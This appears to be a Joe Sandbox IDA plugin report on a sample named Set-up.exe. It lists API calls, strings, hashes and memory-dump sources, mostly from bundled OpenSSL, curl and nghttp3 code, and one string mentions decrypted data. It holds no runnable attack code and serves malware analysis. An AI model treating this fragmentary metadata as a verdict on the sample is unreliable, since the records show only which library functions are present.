                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memchr
                                      • String ID: 0123456789
                                      • API String ID: 3297308162-2793719750
                                      • Opcode ID: b4033fbd99d4d8e3f531505dde1f411cfcd84fa93d8635d62beb2c4538d5430e
                                      • Instruction ID: ee688b5a954540445f7ac7991481869984e0584e0d9446826ece7e39a80105ef
                                      • Opcode Fuzzy Hash: b4033fbd99d4d8e3f531505dde1f411cfcd84fa93d8635d62beb2c4538d5430e
                                      • Instruction Fuzzy Hash: 2DB147616483929FDB218E25A4A07767FC5AF92744F0CC4ADDEC88B3C3D725CD09AB52
                                      APIs
                                        • Part of subcall function 006EB4B0: GetEnvironmentVariableW.KERNEL32(OPENSSL_WIN32_UTF8,00000000,00000000,?,?,00000000,00000000,00000000,?,006F7667,OPENSSL_MODULES), ref: 006EB4CA
                                        • Part of subcall function 006EB4B0: GetACP.KERNEL32(?,?,00000000,00000000,00000000,?,006F7667,OPENSSL_MODULES), ref: 006EB4D4
                                        • Part of subcall function 006EB4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,006F7667,000000FF,00000000,00000000,?,?,00000000,00000000,00000000,?,006F7667,OPENSSL_MODULES), ref: 006EB53B
                                        • Part of subcall function 006EB4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,006F7667,000000FF,-00000008,00000000,?,?,?,00000000,00000000,00000000,?,006F7667,OPENSSL_MODULES), ref: 006EB5A1
                                        • Part of subcall function 006EB4B0: GetEnvironmentVariableW.KERNEL32(-00000008,00000000,00000000,?,?,?,00000000,00000000,00000000,?,006F7667,OPENSSL_MODULES), ref: 006EB5B4
                                        • Part of subcall function 006EB4B0: GetEnvironmentVariableW.KERNEL32(?,-00000008,00000000,?,?,?,?,00000000,00000000,00000000,?,006F7667,OPENSSL_MODULES), ref: 006EB648
                                        • Part of subcall function 006EB4B0: WideCharToMultiByte.KERNEL32 ref: 006EB67F
                                        • Part of subcall function 006EB4B0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(006F7667,?,?,00000000,00000000,00000000,?,006F7667,OPENSSL_MODULES), ref: 006EB504
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0067A1F0
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0067A20B
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000000,00000000), ref: 0067A25D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiVariableWide$strlen$getenvmemcpy
                                      • String ID: %02x$OSSL_QFILTER$QLOGDIR$_%s.sqlog$client$server$ssl/quic/qlog.c
                                      • API String ID: 2744062652-2540125403
                                      • Opcode ID: 0bc7242139731831bed4ac50d27d4653bb760b463b7ae83a4226ffa31ada04be
                                      • Instruction ID: 53b8c9f41fc098e4c1beeb39f0eef219785434ccd58d78285ee5c9b1ca95bc8a
                                      • Opcode Fuzzy Hash: 0bc7242139731831bed4ac50d27d4653bb760b463b7ae83a4226ffa31ada04be
                                      • Instruction Fuzzy Hash: 5A5103B2A043446BEB50AAA59C42B2F76DA9FC0309F08847CFC8D86343FB65DD448666
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0053284C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strlen
                                      • String ID: %s%s%s$Alt-svc connecting from [%s]%s:%d to [%s]%s:%d$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.$url.c
                                      • API String ID: 39653677-4104037097
                                      • Opcode ID: 4d006052211959c0b539e89122f9cf4473aef7f8684c5753d656062ad9d57daa
                                      • Instruction ID: 14c060f41d72f2d2770f39ff611b8f91341ece74672b83ec9f4f3f65903c34a9
                                      • Opcode Fuzzy Hash: 4d006052211959c0b539e89122f9cf4473aef7f8684c5753d656062ad9d57daa
                                      • Instruction Fuzzy Hash: 35A142B06047056FEB248E18C855B7A7FD6BF85354F08886CFD898B293E7719C42C7A2
                                      APIs
                                      • getpeername.WS2_32(?,?,00000080), ref: 0054A376
                                      • WSAGetLastError.WS2_32 ref: 0054A380
                                        • Part of subcall function 005178B0: closesocket.WS2_32(?), ref: 005178BB
                                        • Part of subcall function 0054EF30: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000001,?,?), ref: 0054EF6F
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0054A3D2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0054A3D6
                                      Strings
                                      • getpeername() failed with errno %d: %s, xrefs: 0054A3A0
                                      • cf-socket.c, xrefs: 0054A2E9
                                      • ssrem inet_ntop() failed with errno %d: %s, xrefs: 0054A3F4
                                      • accepted_set(sock=%d, remote=%s port=%d), xrefs: 0054A488
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _errno$ErrorLastclosesocketgetpeername
                                      • String ID: accepted_set(sock=%d, remote=%s port=%d)$cf-socket.c$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                      • API String ID: 1501154218-2965463112
                                      • Opcode ID: e02d667e7f8426c7dcb4a1940d19111a8e5a10092576f154aa530f746776e25a
                                      • Instruction ID: f522138d14c2bf58da93492ae1463d8ad2d851cdf45a666eeb5dc031f81a3bf9
                                      • Opcode Fuzzy Hash: e02d667e7f8426c7dcb4a1940d19111a8e5a10092576f154aa530f746776e25a
                                      • Instruction Fuzzy Hash: 3C513835904341ABEB61DF24DC46FE67BB4BF81318F044518F94D47292EB72A989CB92
                                      APIs
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 005BA5FC
                                      • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 005BA698
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 005BA6BF
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i + 1 < blk->n,nghttp3_ksl.c,0000019B), ref: 005BA6EB
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK,nghttp3_ksl.c,000001A2), ref: 005BA700
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assertmemcpy$memmove
                                      • String ID: i + 1 < blk->n$lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK$nghttp3_ksl.c
                                      • API String ID: 3463011695-2629231663
                                      • Opcode ID: 8e5317f21d8e9a64521c6f69047e4db7b763d87d20ceda4a036784b209ab093f
                                      • Instruction ID: eef0170f9b58468901c55a2efb7e076ed785cda12bcab782730ebcd82da251e5
                                      • Opcode Fuzzy Hash: 8e5317f21d8e9a64521c6f69047e4db7b763d87d20ceda4a036784b209ab093f
                                      • Instruction Fuzzy Hash: CB418275A043059FC708DF18D88196ABBE5FF98304F18C96DF8498B352E670ED41CB91
                                      APIs
                                      • CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00752491
                                      • CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 007524C6
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0074F5B4), ref: 00752529
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: CertCertificateContextProperty$ErrorLast
                                      • String ID: %lX$ERR_CAPI_error$Error code= 0x$engines/e_capi.c$engines/e_capi_err.c
                                      • API String ID: 2217977984-837018288
                                      • Opcode ID: 8a73afe8ba9cb92a8bfa8741f0027dd5ebf14c0bde401c378adbb6ca19045a82
                                      • Instruction ID: 577796534cf295ad973fb31d7885252ff293882c7f447cd9cdedfd4c9888e423
                                      • Opcode Fuzzy Hash: 8a73afe8ba9cb92a8bfa8741f0027dd5ebf14c0bde401c378adbb6ca19045a82
                                      • Instruction Fuzzy Hash: 0211C8A5B8030077F6603371BC4BF3B3A4DDB52B45F044068BD09A81E3F5F599258ABA
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00562666
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00562699
                                      • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 005626FB
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 0056273A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strlen$_time64memcpy
                                      • String ID: :%u$Shuffling %i addresses$hostip.c
                                      • API String ID: 2198566249-1766712111
                                      • Opcode ID: c229493032043c7c53425433bc4219b2a76d6ea091fed614cc3c3ce1b5105744
                                      • Instruction ID: fad7627af60e75ce9659ed363be7c0e596e5d1577492213c10e026d75f37f3d4
                                      • Opcode Fuzzy Hash: c229493032043c7c53425433bc4219b2a76d6ea091fed614cc3c3ce1b5105744
                                      • Instruction Fuzzy Hash: 88A1E175604B019BD734DF18C845BAABBE5FF98304F18882DED8A87392E735E9518B81
                                      APIs
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 008969F1
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000001,00000000,00000000,?,00000009,?), ref: 00896A11
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,000000FF,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00896A53
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00896AB6
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00896AC7
                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00896ADA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _errno$abortmemcpymemset
                                      • String ID: UTF-8
                                      • API String ID: 3754757788-243350608
                                      • Opcode ID: f528b4aa29557ac4832ccccc7a9802a64069f38b83425ef4e1617f6f42447d6a
                                      • Instruction ID: 31641ac10952ac13c14db9d3b217b4e00776ba6b34716e2bfe09f766116acc6d
                                      • Opcode Fuzzy Hash: f528b4aa29557ac4832ccccc7a9802a64069f38b83425ef4e1617f6f42447d6a
                                      • Instruction Fuzzy Hash: AB41C070A08311AFDF11AF28D895B2A7BE5FB85354F0C892DF885C7282F631DC24C652
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00512359
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00512465
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005124AB
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005123EE
                                        • Part of subcall function 00511A54: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00511A70
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: free$abortmallocstrlen
                                      • String ID: $ $ $Memory allocation failed for decrypted data.
                                      • API String ID: 673139954-1317699236
                                      • Opcode ID: b5022830ec323f8349cecab23169503ae0174b3210d64fd00045cca81775a50d
                                      • Instruction ID: dcd7f598514d77af119d55d2bdaf31553ed33b4672c2bc9df95e39abd98fe83a
                                      • Opcode Fuzzy Hash: b5022830ec323f8349cecab23169503ae0174b3210d64fd00045cca81775a50d
                                      • Instruction Fuzzy Hash: 535192B4A04709DFDB40EFA9C08599EBBF1FF88300F10895AE85897315E774D9848F96
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0072E16C
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0072E17B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strlen
                                      • String ID: $ for$:$Ente$crypto/ui/ui_lib.c$er
                                      • API String ID: 39653677-1187194756
                                      • Opcode ID: 42dc0b0923c92da94c46e06643b6ed6c527b8d6c5434076a41883a6afdce7f3e
                                      • Instruction ID: 71e383ebd98d0e123a7264a53977ab2a17587e7ff9ff2c67b0fce94b15c92c7d
                                      • Opcode Fuzzy Hash: 42dc0b0923c92da94c46e06643b6ed6c527b8d6c5434076a41883a6afdce7f3e
                                      • Instruction Fuzzy Hash: 5321C8F6D053647BE610AA166C42D6B77ECED91394F09443DFD0C86242F636C924C2E3
                                      APIs
                                        • Part of subcall function 0052D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,005201B1), ref: 0052D8E2
                                      • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,0055420E,?,?), ref: 00526350
                                      • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(0055420E,?,?,?,?,?,?,?,?,?,0055420E,?,?), ref: 0052635B
                                      • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00526369
                                      • Sleep.KERNEL32(00000001), ref: 005263B2
                                      • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 005263BC
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0055420E,?,?), ref: 005263C7
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0055420E,?,?), ref: 005263D6
                                        • Part of subcall function 0052D8C0: GetTickCount.KERNEL32 ref: 0052D968
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 005263ED
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: free$FileMove_strdup$CountCounterPerformanceQuerySleepTick
                                      • String ID:
                                      • API String ID: 1793959362-0
                                      • Opcode ID: 7bd4fac319445b9fc66338db1d579d6b7da250b5da431391b84d9a86915dd7e7
                                      • Instruction ID: 9ff4e931bc7f4d6314b10d64b39aeb47f12c3813e56d6df3dd8ea9d391198526
